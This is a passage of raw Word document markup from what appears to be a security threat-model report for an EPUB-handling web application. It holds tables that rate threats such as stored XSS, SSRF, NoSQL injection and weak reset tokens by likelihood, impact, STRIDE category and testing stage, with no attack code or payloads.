              <w:t>Weak PRNG reset token</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05C12A">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A80DAC">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2823DB">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AADAF9">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DB5C0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>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8CD436E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6021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BB21B1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T-07</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F4C943">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>JWT theft via XSS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7C777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9</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F37B4E">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16DCEE">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7B98DC">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9</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943B22">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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CC823DD">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="548F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8E13A3">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T-08</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73108">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Path traversal epub-upload</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A9FC29">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22F8CD">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7EB313">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>4</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5BBAB1">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9040A">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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1299274C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F39C12"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="18F4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CFB9D5">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T-09</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0A16AA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>No audit log</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0DF3F4">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>4</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D79B1">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5A8AE2">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10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D4076">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3</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0EFB4C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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C207CAD">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F39C12"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="53CA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69038">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T-10</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C1FADD">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DoS via large EPUB</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5EA999">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7698AB">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7</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93E52">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A9B7B6">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5A399F">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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79BB7377">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F39C12"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3F6E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34393">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T-11</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E6371">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>IDOR phantom progress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364D2">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>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A1A6AA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>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128B5D">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>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711D8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3</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B358F6">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="116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0C2F5FCA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="27AE60"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5DB2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23CFD5">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T-12</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50C844">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Orphaned progress records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A841D8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>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7DE7F">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>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443E1B">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3</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A06792">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>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8486F5">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="116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28D445B0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="27AE60"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="48CADA22">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE7D270">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>6. Threat Prioritization Matrix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3757D3E8">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Threats are mapped against likelihood and impact to guide the exploitation and remediation phases.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2282"/>
        <w:gridCol w:w="1240"/>
        <w:gridCol w:w="1196"/>
        <w:gridCol w:w="1196"/>
        <w:gridCol w:w="1200"/>
        <w:gridCol w:w="1550"/>
      </w:tblGrid>
      <w:tr w14:paraId="57F1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25A37340">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="23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2D281E57">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Threat</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060D92F9">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Likelihood</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3AEA2435">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Impact</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2C422CA3">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Risk</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1A3C9752">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>STRIDE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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411B6BAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pipeline Stage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="36B1B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84F69F">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T-01</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5058F9">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>JWT secret hardcoded default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1DFC20">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EB27D4">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>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0748EC06">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CB6DAB">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Spoofing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3A5D8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SAST</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="19A5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42E3AD">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T-02</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68DC9A">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Stored XSS via malicious EPUB</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FF0838">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325431">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>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674DB0CD">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D64E52">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Tampering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6795B8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DAST + Manual</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="24F2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059EAB">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T-03</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6A686C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SSRF via epub-proxy</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3A4AA8">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0E713B">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>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65A29415">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B0F586">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Info Disc.</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15CEBA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DAST + Manual</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="28C4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3CBA7F">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T-04</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ACC150">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>NoSQL injection on login</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C76B75">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AE2366">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4A84F19">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A0DB5">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Spoofing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09465D">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SAST + DAST</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6F65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4DD1D3">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T-05</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96718">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Mass assignment</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0E8A97">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88422A">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2F7AA3E5">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A79600">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Elev. Priv.</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0C4D6">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SAST</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4A0D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3086EB">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T-06</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A4F532">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Weak PRNG reset tokens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DB8A6A">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513CC">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722B83A5">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17BC39">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Spoofing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1316CA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SAST</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2D26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1E34A2">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T-07</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C69AE5">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>JWT theft via XSS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C71B74">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0DCE9D">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27B4D2C">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61D8B0">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Info Disc.</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808AF4">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DAST</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="336D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6FA37D">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T-08</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99812">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Path traversal epub-upload</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7FFF7F">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286388">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5616D155">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B005F5">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Info Disc.</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3D8FF6">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DAST</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4DCE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1511B4">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T-09</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2C6C3E">
            <w:r>
              <w:rPr>
